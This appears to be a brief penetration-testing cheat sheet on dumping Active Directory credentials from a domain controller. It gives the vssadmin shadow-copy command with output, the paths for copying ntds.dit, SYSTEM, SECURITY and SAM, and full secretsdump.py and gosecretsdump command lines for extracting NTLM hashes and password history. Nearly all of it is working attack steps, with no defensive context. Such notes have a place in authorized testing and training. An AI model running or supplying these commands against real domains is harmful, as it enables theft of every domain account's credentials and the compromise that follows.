NTDS.dit Dump&Extract

On Domain Controller - create snapshot with vssadmin.exe.

PS C:\temp> vssadmin.exe create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5
PS C:\temp>

To make it easy for yourself and extract the ntds.dit and SYSTEM file from the ShadowCopy, you can use ShadowCopyView

  • NTDS.DIT-SYSTEM.zip (14777 kb)
  • shadowcopyview-x64.zip (77 kb)
  • shadowcopyview.zip (64 kb)

    • Copy NTDS.dit

    Path: C:\Windows\NTDS\ntds.dit

    example

    Copy SYSTEM

    Path: C:\Windows\System32\config\SYSTEM

    Preferably you want to also make a copy of:

    • SECURITY - C:\Windows\System32\config\SECURITY
    • SAM - C:\Windows\System32\config\SAM

    example

    Extract hashes

    It can happen that secretsdump.py keeps looping and throwing out hashes. In this case, or maybe even preferably, use Gosecretsdump.

    Secretsdump.py

    secretsdump.py -system SYSTEM -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile extracted-hashes -just-dc-ntlm -user-status -history

    Gosecretsdump

    ./gosecretsdump -system SYSTEM -ntds NTDS.DIT -history -status -out hashes.log

    Example NTDS/SYSTEM

    Example NTDS.dit and SYSTEM files zipped below.

  • NTDS.DIT-SYSTEM.zip (14777 kb)

    • URL list